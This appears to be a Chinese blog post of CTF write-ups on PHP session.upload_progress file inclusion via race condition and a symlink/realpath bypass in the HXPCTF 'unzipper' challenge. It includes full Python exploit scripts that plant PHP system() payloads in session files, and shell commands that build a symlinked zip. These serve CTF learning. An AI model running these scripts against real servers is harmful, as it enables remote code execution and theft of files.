session.upload_progress文件包含

目录

一、[第五空间 2021]EasyCleanup

二、[HNCTF 2022 WEEK3]QAQ_1inclu4e


一、[第五空间 2021]EasyCleanup

进入题目:源代码

<?php 
if(!isset($_GET['mode'])){ 
    highlight_file(__file__); 
}else if($_GET['mode'] == "eval"){ 
    $shell = isset($_GET['shell']) ? $_GET['shell'] : 'phpinfo();'; 
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker"); 
    eval($shell); 
} 


if(isset($_GET['file'])){ 
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker"); 
    include $_GET['file']; 
} 


function filter($var){ 
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"]; 

    foreach($banned as $ban){ 
        if(strstr($var, $ban)) return True; 
    } 

    return False; 
} 

function checkNums($var){ 
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'; 
    $cnt = 0; 
    for($i = 0; $i < strlen($alphanum); $i++){ 
        for($j = 0; $j < strlen($var); $j++){ 
            if($var[$j] == $alphanum[$i]){ 
                $cnt += 1; 
                if($cnt > 8) return True; 
            } 
        } 
    } 
    return False; 
} 
?>

源代码中可以进行参数shell的文件执行,会参数file的文件包含,但是限制了字符,并且对a-z0-9A-Z进行了匹配,存在就exit(),要绕过这些匹配进行shell的rce执行,自己好像没有什么办法,先看看phpinfo()的内容。

关键点在于:

1,session.save_handler	files	files
2,session.save_path	/tmp	/tmp
3,session.serialize_handler	php	php
4,session.upload_progress.cleanup	On	On
5,session.upload_progress.enabled	On	On
6,session.upload_progress.freq	1%	1%
7,session.upload_progress.min_freq	1	1
8,session.upload_progress.name	PHP_SESSION_UPLOAD_PROGRESS	PHP_SESSION_UPLOAD_PROGRESS
9,session.upload_progress.prefix	upload_progress_	upload_progress_
10,session.use_cookies	On	On
11,session.use_only_cookies	On	On
12,session.use_strict_mode	Off	Off

第一行表示session以文件的形式存储。

第二行表示session存储目录在/tmp下。

第三行表示反序列化和序列号的处理器是PHP。

第五行表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。

第四行表示文件上传结束后,php会立即清除对应session文件中的内容。

第六七行中的freq 和 min_freq 两项用来设置服务器端对进度信息的更新频率。合理的设置这两项可以减轻服务器的负担。

第八九行中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。

第十行表示使用cookie记录sessionid。

第十一行表示是否在客户端仅仅使用 cookie 来存放会话 ID。

第十二行中的值为off,表示Cookie中的sessionid可控。

解题思路:

当我们自己定义Cookie中的PAPSESSID时,PHP为在服务器创建文件并存储在tmp/sess_id。服务器会自动初始化Session,由(prefix+session.upload_progress.name)组成,由于十二行为off,可以自定义cookie存储session文件,然后控制文件的内容,进行file的文件包含,因为cleanup是开启的,所以需要使用条件竞争,在php为清除掉时,就访问临时tmp/sess_id文件包含进去。

一般Session的存放目录有:

/tmp/sess_PHPSESSID
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

即传输这样的内容:

 脚本:

import requests
import threading

myurl = 'http://1.14.71.254:28736/index.php'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /nssctfasdasdflag');?>"}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?file=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)
得到结果

二、[HNCTF 2022 WEEK3]QAQ_1inclu4e

1、进入题目

只给了传base64的提示,提示flag在神秘的地方。 这里看了别人的WP才知道,也是session的文件包含,直接上一样的脚本即可得到flag。

import requests
import threading

myurl = 'http://43.143.7.97:28307/'
sessid = '1a1'
writedata = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /var/ffflllaaagggflag');?>"}
mycookie = {'PHPSESSID': sessid}
proxies = {
    "http": "127.0.0.1:8080",
}


def send_file(session):
    while True:
        resp = requests.post(url=myurl, data=writedata, files={'file': ('1.txt', 123)}, cookies=mycookie)

def getflag(session):
    while True:
        payload_url = myurl + '?QAQ=' + '/tmp/sess_' +sessid
        resp = requests.get(url=payload_url)
        if 'upload_progress' in resp.text:
            print(resp.text)
            break


if __name__ == '__main__':
    session = requests.session()
    t = threading.Thread(target=send_file, args=(session,))
    t.start()
    getflag(session)

[HXPCTF 2021]unzipper

<?php
session_start() or die('session_start');

$_SESSION['sandbox'] ??= bin2hex(random_bytes(16));
$sandbox = 'data/' . $_SESSION['sandbox'];
$lock = fopen($sandbox . '.lock', 'w') or die('fopen');
flock($lock, LOCK_EX | LOCK_NB) or die('flock');

@mkdir($sandbox, 0700);
chdir($sandbox) or die('chdir');

if (isset($_FILES['file']))
    system('ulimit -v 8192 && /usr/bin/timeout -s KILL 2 /usr/bin/unzip -nqqd . ' . escapeshellarg($_FILES['file']['tmp_name']));
else if (isset($_GET['file']))
    if (0 === preg_match('/(^$|flag)/i', realpath($_GET['file']) ?: ''))
        readfile($_GET['file']);

fclose($lock);

很像是session文件包含,但是其实不是,这是一道软连接的题目,挺新奇的,于是记录一下

简单分析下代码: 可以通过post传入file文件,文件会被unzip解压到随机16字节的data/目录中,然后提供了readfile方法读取文件,但是不能出现flag,否则会被realpath替代掉。realpath会解析软链接的路径,返回一个绝对路径。

整个解题思路就是readfile在接收url路径的参数时,比如file:///flag.txt会去读取/flag.txt文件,而realpath会视作file:文件夹下的flag.txt文件,如果我们制作一个指向file:文件夹的aaa任意文件,它在 realpath 时被扩展为..../file:/aaa可以通过 if 比较,而在 readfile 中则会按照 url 的方式进行解析,读取根目录下的 flag.txt。

mkdir file:
cd file:
touch amiz.txt
ln -s amiz.txt flag.txt
cd ..
zip -ry tttttemp.zip file:

import requests

headers = {
    'Cookie': 'PHPSESSID=eppr850012o74krcqb5o9kunsq'
}

url = 'http://node4.anna.nssctf.cn:28442/'


def upload():
    resp = requests.post(url, files={'file': open(file='A:\下载\\tmp.zip', mode='rb')}, headers=headers)
    print(resp.text)


def read():
    params = {
        'file': "file:///flag.txt"
    }
    resp = requests.get(url, params=params, headers=headers)
    print(resp.text)


upload()
read()

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值